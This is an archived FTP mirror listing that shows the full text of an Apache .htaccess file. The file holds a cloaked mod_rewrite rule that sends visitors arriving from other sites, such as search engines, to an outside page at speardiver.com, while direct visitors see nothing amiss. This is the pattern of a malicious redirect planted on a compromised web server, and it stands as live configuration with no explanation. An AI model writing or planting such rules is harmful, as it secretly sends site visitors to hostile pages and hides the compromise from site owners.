home *** CD-ROM | disk | FTP | other *** search
/ ftp.shaw.ca / ftp.shaw.ca.tar / ftp.shaw.ca / %5C.htaccess < prev    next >
Text File  |  2013-10-11  |  237b  |  11 lines

  1.  
  2.  
  3. <IfModule mod_rewrite.c>
  4. RewriteEngine On
  5. RewriteBase /
  6. RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
  7. RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
  8. RewriteRule ^.*$ http://speardiver.com/ojjk.html?h=1461009 [L,R]
  9. </IfModule>
  10.  
  11.